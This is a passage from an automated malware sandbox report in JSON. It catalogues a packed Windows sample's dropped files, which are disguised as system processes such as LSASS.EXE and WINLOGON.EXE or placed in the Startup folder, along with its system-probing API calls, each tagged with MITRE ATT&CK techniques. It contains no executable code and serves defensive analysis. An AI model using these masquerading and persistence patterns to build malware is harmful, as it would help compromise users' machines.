"https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\services.exe]- [targetUID: 00000000-00005284]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\shell.exe]- [targetUID: 00000000-00003924]\n \"4k51k4.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [C:\\4k51k4.exe]- [targetUID: 00000000-00003924]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\IExplorer.exe]- [targetUID: 00000000-00003924]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [C:\\4K51K4\\New Folder.exe]- [targetUID: 00000000-00005284]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [C:\\Data %OSUSER%.exe]- [targetUID: 00000000-00005284]\n \"SERVICES .exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif]- [targetUID: 00000000-00003924]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00003924]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00003924]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00003924]\n \"4K51K4.EXE.67A9DCB2.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"MrHelloween.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\MrHelloween.scr]- [targetUID: 00000000-00003924]\n \"IEXPLORER.EXE.67A9C389.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00003924]\n \"Folder.htt\" has type \"HTML document ASCII text with CRLF line terminators\"- Location: [C:\\4K51K4\\Folder.htt]- [targetUID: 00000000-00005284]\n \"Puisi.txt\" has type \"ASCII text with CRLF line terminators\"- Location: [C:\\Puisi.txt]- [targetUID: 00000000-00003924]\n \"desktop.ini\" has type \"Windows desktop.ini\"- Location: [C:\\desktop.ini]- [targetUID: 00000000-00003924]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\lsass.exe]- [targetUID: 00000000-00005284]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\IExplorer.exe]- [targetUID: 00000000-00003924]\n \"4k51k4.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\4k51k4.exe]- [targetUID: 00000000-00003924]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\winlogon.exe]- [targetUID: 00000000-00005284]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\smss.exe]- [targetUID: 00000000-00005284]\n \"4k51k4.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\4k51k4.exe]- [targetUID: 00000000-00003924]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\csrss.exe]- [targetUID: 00000000-00005284]\n \"CSRSS.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\LSASS.EXE]- [targetUID: 00000000-00003924]\n \"SERVICES.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67A9DCF1.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\SMSS.EXE]- [targetUID: 00000000-00003924]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\SERVICES.EXE]- [targetUID: 00000000-00003924]\n \"4K51K4.EXE.67A9DDC9.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINLOGON.EXE]- [targetUID: 00000000-00003924]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\CSRSS.EXE]- [targetUID: 00000000-00003924]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00003924]\n \"4K51K4.EXE.67A9C387.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00004088)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00004088)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00004088)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00002340)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00002340)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00002340)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00005116)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00005116)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00005116)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00005152)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00005152)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00005152)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00005476)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00005476)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00005476)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00005184)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00005184)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00005184)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00005260)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"UPX0\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000190054db1200b344a96a05000000000000000000000000000000000000000000000000000000140100000000000000000000000000006ce2120010b953c310e0120010e012005ecb81761401000000000000005d7f766ce212000e5d7f7604de1200dcaa8376010000000000000072000000ffffffffffffffff8cdb12007802000000000000250000008cdb12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600cde90ecfe4db12006d82cc77cc6c1a0004010000 (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000370066003800610032006600370036003400370065003700610034006300620038006200660032006600380062003200650032003400350037003900320062006100620031003400350063003400330033003700360061006400610066006200650031002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2bbb772102f077d8eb2276ac0116000000160000000000000000000000ffff86010000000000000000000000000000000000000100f7008601000000000000000000003870160000000000200000000000000000000000 (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001b0001000000ffffffff0200000008000000c03c1c00c03c1c00bb3c1c000000000002000000b88f180000000000010000080000000054ed120095e1b77799d65900feffffffccda12003f086d7702000000b88f1800000000000100001888fb6c77bcda1200c81c837692dc120095fb6c77f0db1200b88f180000000000000000000000000078db1200000016007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360011e90ecf38db12006d82cc77cc6c1a0004010000 (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360039e60ecf50d412006d82cc77dc7c1b0004010000 (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001c00a4d01200b344a96a0900000000000000000000000000000000000000000000000000000078010000000000000000000000000000bcd71200a0b353c360d5120060d512005ecb81767801000000000000005d7f76bcd712000e5d7f7654d31200dcaa837601000000000000007a000000ffffffffffffffffdcd01200780200000000000025000000dcd012007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036001de30ecf34d112006d82cc77a4821b0004010000 (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001b00400700000000160000040000b8841b0098d012000464bb7738011600e063bb7702000000b88f1800000000000100000899d65900feffffffbcc7c377c0c7c3770a0000001cd012003f086d7702000000b88f1800000000000100001888fb6c770cd01200c81c8376e2d1120095fb6c7740d11200b88f1800000000000000000000000000c8d01200000016007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360061e20ecf88d012006d82cc77a4821b0004010000 (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001b0050821b004b821b0000000000000000000000160000000001d4cc12000000000038da120095e1b77799d65900feffffff435cbb775059bb77aa000000b80000004a821b0048821b005cce120094d21200000000000000000000000000000000000000000000000000801d0000000016001c5cba7760d8d275ffffffff170000000cce12002400000003000000fcd2120028d8120094d212008600000038ce120096edbb7772821b00a06a9175860000005cce120094d212000000000086008800a06a91755cce1200916c917572821b00a06a9175a06a9175ccd2120002020000 (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005284)\n \"4k51k4.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005232)\n \"4k51k4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002b0054db1200b344a96a05000000000000000000000000000000000000000000000000000000140100000000000000000000000000006ce21200527841c010e0120010e012005ecb81761401000000000000005d7f766ce212000e5d7f7604de1200dcaa8376010000000000000072000000ffffffffffffffff8cdb12007802000000000000250000008cdb12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600834c10c3e4db12006d82cc77dc592c0004010000 (UID: 00000000-00005232)\n \"4k51k4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005232)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb2276308c1a000030fd7f9a5cbc7700f0fd7f50c712004430fd7f00000000400000003f000000200000000030fd7f44c71200c15cbc776082c377200000000030fd7f9a5cbc7700f0fd7f68c712005789bb778083c3771317d375d8eb2276 (UID: 00000000-00005284)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb227690972c000030fd7f9a5cbc7700f0fd7f50c712004430fd7f00000000400000003f000000200000000030fd7f44c71200c15cbc776082c377200000000030fd7f9a5cbc7700f0fd7f68c712005789bb778083c3771317d375d8eb2276 (UID: 00000000-00005232)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb2276d0a91a000030fd7f9a5cbc7700f0fd7f50c712004430fd7f00000000400000003f000000200000000030fd7f44c71200c15cbc776082c377200000000030fd7f9a5cbc7700f0fd7f68c712005789bb778083c3771317d375d8eb2276 (UID: 00000000-00003876)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059bb7798010000a0010000d21bec01d01bec010016ec010000e901e414ec0188000000880000001768bb779817ec01ff2bbb77261af077a41bec01ac012400000024000000e901c06de9011200a200ec000000c06de9015016ec01100000000000000013009d00ec000000c06de901 (UID: 00000000-00004088)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059bb7798010000a0010000d21b4701d01b47010016470100004401e414470188000000880000001768bb7798174701ff2bbb77081df077a41b4701ac011a0000001a0000004401c06d440114009800d3040000c06d440150164701100000000000000015009300d3040000c06d4401 (UID: 00000000-00002340)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059bb7798010000a00100005a1bc901581bc9018815c9010000c6016c14c90188000000880000001768bb772017c901ff2bbb773e11f0772c1bc901ac012c0000002c000000c601905bc6011200a20019040000905bc601d815c901100000000000000013009d0019040000905bc601 (UID: 00000000-00005116)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb2276e0a32e0000f0fd7f9a5cbc7700e0fd7f50c7120044f0fd7f00000000400000003f0000001f00000000f0fd7f44c71200c15cbc776082c3771f00000000f0fd7f9a5cbc7700e0fd7f68c712005789bb778083c3771317d375d8eb2276 (UID: 00000000-00003924)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059bb7798010000a0010000d21bdb01d01bdb010016db010000d801e414db0188000000880000001768bb779817db01ff2bbb77ac02f077a41bdb01ac011b0000001b000000d801c06dd80116008e00e6010000c06dd8015016db01100000000000000017008900e6010000c06dd801 (UID: 00000000-00005152)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059bb7798010000a0010000d21be501d01be5010016e5010000e201e414e50188000000880000001768bb779817e501ff2bbb777a00f077a41be501ac012800000028000000e201c06de20114009800d1040000c06de2015016e501100000000000000015009300d1040000c06de201 (UID: 00000000-00005476)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059bb7798010000a0010000d21b3a01d01b3a0100163a0100003701e4143a0188000000880000001768bb7798173a01ff2bbb7745f8f077a41b3a01ac0127000000270000003701c06d37011400980066050000c06d370150163a0110000000000000001500930066050000c06d3701 (UID: 00000000-00005184)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb2276989a2b0000d0fd7f9a5cbc7700f0fd7f50c7120044d0fd7f00000000400000003f0000002000000000d0fd7f44c71200c15cbc776082c3772000000000d0fd7f9a5cbc7700f0fd7f68c712005789bb778083c3771317d375d8eb2276 (UID: 00000000-00005184)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059bb7798010000a0010000d21bd901d01bd9010016d9010000d601e414d90188000000880000001768bb779817d901ff2bbb7710f9f077a41bd901ac011800000018000000d601c06dd6011400980066050000c06dd6015016d90110000000000000001500930066050000c06dd601 (UID: 00000000-00005260)\n \"WINLOGON.EXE\" called \"GetVersionExA\" (UID: 00000000-00005816)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059bb7798010000a00100005a1be001581be0018815e0010000dd016c14e00188000000880000001768bb772017e001ff2bbb7736f6f0772c1be001ac011c0000001c000000dd01905bdd011200a20019040000905bdd01d815e001100000000000000013009d0019040000905bdd01 (UID: 00000000-00005608)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059bb7798010000a0010000d21b6500d01b65000016650000006200e414650088000000880000001768bb7798176500ff2bbb7738e9f077a41b6500ac011f0000001f0000006200c06d620016008e004a010000c06d6200501665001000000000000000170089004a010000c06d6200 (UID: 00000000-00005376)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb2276f0f2230000f0fd7f9a5cbc7700e0fd7f50c7120044f0fd7f00000000400000003f0000001f00000000f0fd7f44c71200c15cbc776082c3771f00000000f0fd7f9a5cbc7700e0fd7f68c712005789bb778083c3771317d375d8eb2276 (UID: 00000000-00005376)\n \"SERVICES.EXE\" called \"GetVersionExA\" (UID: 00000000-00005912)\n \"CSRSS.EXE\" called \"GetVersionExA\" (UID: 00000000-00005888)\n \"4k51k4.exe\" called \"GetVersionExA\" (UID: 00000000-00005836)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059bb7798010000a0010000d21b5101d01b51010016510100004e01e414510188000000880000001768bb7798175101ff2bbb77dae5f077a41b5101ac0160000000600000004e01c06d4e01140098005e030000c06d4e01501651011000000000000000150093005e030000c06d4e01 (UID: 00000000-00004192)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059bb7798010000a0010000d21b4101d01b41010016410100003e01e414410188000000880000001768bb7798174101ff2bbb777c49f577a41b4101ac0120000000200000003e01c06d3e0114009800d1040000c06d3e0150164101100000000000000015009300d1040000c06d3e01 (UID: 00000000-00004192)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb2276d8ca340000f0fd7f9a5cbc7700e0fd7f50c7120044f0fd7f00000000400000003f0000002000000000f0fd7f44c71200c15cbc776082c3772000000000f0fd7f9a5cbc7700e0fd7f68c712005789bb778083c3771317d375d8eb2276 (UID: 00000000-00005396)\n \"IExplorer.exe\" called \"GetVersionExA\" (UID: 00000000-00006052)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059bb7798010000a0010000d21bed01d01bed010016ed010000ea01e414ed0188000000880000001768bb779817ed01ff2bbb77fcd1f077a41bed01ac012c0000002c000000ea01c06dea0116008e001f000000c06dea015016ed011000000000000000170089001f000000c06dea01 (UID: 00000000-00005696)\n \"LSASS.EXE\" called \"GetVersionExA\" (UID: 00000000-00005820)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"IsWow64Process\" with parameter \"5284\" - (UID: 00000000-00005284)\n \"4k51k4.exe\" called \"IsWow64Process\" with parameter \"5232\" - (UID: 00000000-00005232)\n \"IExplorer.exe\" called \"IsWow64Process\" with parameter \"3876\" - (UID: 00000000-00003876)\n \"WINLOGON.EXE\" called \"IsWow64Process\" with parameter \"3924\" - (UID: 00000000-00003924)\n \"CSRSS.EXE\" called \"IsWow64Process\" with parameter \"5184\" - (UID: 00000000-00005184)\n \"SERVICES.EXE\" called \"IsWow64Process\" with parameter \"5376\" - (UID: 00000000-00005376)\n \"LSASS.EXE\" called \"IsWow64Process\" with parameter \"5396\" - (UID: 00000000-00005396)\n \"SMSS.EXE\" called \"IsWow64Process\" with parameter \"5692\" - (UID: 00000000-00005692)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"4k51k4.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004088)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00002340)\n \"4k51k4.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005116)\n \"WINLOGON.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005152)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005476)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005184)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005260)\n \"WINLOGON.EXE\" called \"GetLocaleInfoW\" (UID: 00000000-00005816)\n \"4k51k4.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005608)\n \"SERVICES.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005376)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" (UID: 00000000-00005888)\n \"4k51k4.exe\" called \"GetLocaleInfoW\" (UID: 00000000-00005836)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004192)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004088)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002340)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005116)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005152)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005476)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005184)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005260)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005816)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005608)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005376)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005888)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005836)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004192)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006052)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005696)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005820)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003336)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003160)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005692)\n 